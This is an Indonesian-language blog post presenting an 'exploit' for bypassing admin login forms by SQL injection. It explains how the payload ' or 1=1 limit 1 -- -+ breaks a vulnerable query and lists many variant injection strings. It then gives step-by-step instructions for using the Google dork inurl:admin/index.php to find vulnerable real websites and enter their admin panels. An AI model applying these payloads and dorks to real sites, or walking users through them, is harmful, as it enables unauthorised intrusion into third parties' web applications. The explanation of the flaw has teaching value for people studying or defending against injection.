Knowledge Hunter - Selamat Malam sobat knowledge-h,apa kabar? saya berharap baik semua ya kali ini admin akan membahas Exploit Query String Bypass Admin Login Query String Bypass Admin Login adalah suatu perintah sql dimana system akan mengeksekusi menjadi query dari user:pass administrator untuk masuk ke halaman admin panel.query itu sendiri ' or 1=1 limit 1 -- -+ <~
Hal tersebut terjadi karena form login tersebut dicek dengan menggunakan perintah :"SELECT * FROM user WHERE username = '$username' AND password = '$password'"Sehingga jika variabel username diberi input (' or 1=1--), maka query SQLnya akan menjadi"SELECT * FROM user WHERE username = '' or 1=1--' AND password = ''"
Pernyataan 1=1 akan membuat query tersebut selalu mengembalikan nilai TRUE untuk pernyataan tersebut. Karakter double sign setelah username akan membuat pemeriksaan terhadap password akan diabaikan sehingga penyusup tidak perlu memasukan password.Selain dengan String tersebut, beberapa String berikut juga biasa digunakan untuk mengecek adakah celah keamanan pada suatu form login. String – string tersebut adalah:' or 1=1-- " or 1=1—or 0=0 -- ' or 1=1 #" or 1=1 # or 0=0 #' or 'x' = 'x " or "x" = "x') or ('x' = 'x ' or 1=1--" or 1=1-- or 1=1--" or a=a--
Langsung saja >>
- Buka Google
- Search di Google dork ini : inurl:admin/index.php
- Cari Link yang Sekiranya Vuln
Setiap Target mempunyai admin login yang berbeda
Contoh punya saya :
4. Jika sudah masukkan di kotak Username dan Password : ' or 1=1 limit 1 -- -+ <~
5. Jika vuln kita dapat memasuki admin panel dari Website tersebut
Semoga Exploit yang saya berikan bermanfaat.Sampai jumpa di Exploit berikutnya!
